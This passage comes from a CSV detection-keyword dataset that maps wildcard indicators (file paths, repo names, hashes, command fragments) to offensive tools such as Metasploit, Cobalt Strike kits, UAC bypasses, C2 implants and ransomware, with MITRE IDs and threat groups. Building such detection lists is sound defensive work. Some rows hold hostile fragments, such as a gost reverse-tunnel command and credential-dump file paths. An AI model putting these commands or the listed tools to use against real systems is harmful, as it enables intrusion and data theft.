TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*bypassuac-x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac-x64.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac-x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac-x86.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypasswaf.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*bypasswaf.jar*","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","323","117","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z" +"*bypasswaf.py*","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","323","117","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z" +"*byt3bl33d3r*","offensive_tool_keyword","Github Username","malware and offensive tools developper ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/byt3bl33d3r","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*byt3bl33d3r/BOF-Nim*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","83","12","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" +"*byt3bl33d3r/DeathStar*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*byt3bl33d3r/gcat*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" +"*byt3bl33d3r/ItWasAllADream*","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" +"*byt3bl33d3r/pth-toolkit*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*byt3bl33d3r/SpamChannel*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","257","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" +"*-c /tmp/redsocks.conf*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*-c 854A20FB-2D44-457D-992F-EF13785D2B51*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*-c BOF.cpp -o BOF.o*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*-c BOF.cpp -o BOF.x64.o*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*-c credentialmanager.c -o credentialmanager.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*-c modifiableautorun.c -o modifiableautorun.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*-c tokenprivileges.c -o tokenprivileges.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*-c unquotedsvcpath.c -o unquotedsvcpath.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*C&C => *","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*c:/users/public/creds.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*C:\aab.txt*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*c:\agent.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*C:\dsc_hello.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*C:\ProgramData\Prefetch\na.exe*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*C:\ProgramData\SystemData\microsoft_Windows.dll*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*C:\Temp\file.exe*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*C:\Temp\poc.txt*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","0","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" +"*c:\temp\something.ps1*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*C:\temp\tmp.tmp*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*C:\Uac\results.cab*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" +"*C:\Users\*\AppData\Roaming\Indexing.*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*C:\Users\*\AppData\Roaming\svchost.exe*","offensive_tool_keyword","chaos","Chaos ransomware behavior","T1486","TA0040","chaos ransomware","N/A","Ransomware","https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*C:\Users\Public\*.dmp*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*c:\users\public\creds.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*c:\users\public\output.txt*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*C:\Users\Public\perm.txt*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*C:\Users\Public\test.txt*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*C:\Windows\DirectX.log*\Windows\Temp\backup.log*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","0","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" +"*C:\Windows\MEMORY.DMP*","greyware_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*C:\Windows\System.exe* -L rtcp://0.0.0.0:8087/127.0.0.1:4444 -F socks5://*:*@*:443*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z" +"*C:\Windows\Temp\move.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*C:\Windows\Temp\moveme.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*c:\windows\temp\test.tmp farmer*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*C??/generator.cpp*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*c0ddb8ed4e267153cd7fd2fb858e0a18fd8fa88ddc3f748bcee35372f41bec46*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*c1090dbc-f2f7-4d90-a241-86e0c0217786*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*c1405b280bacc7566ccd041a74461de3f8496128fd71e39368905cf8d95268f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*C2 Client*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*C2 Framework for villains*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*C2 Nimplant Server*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*C2 Server*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*C2.KillDate*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*c2.striker.*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - 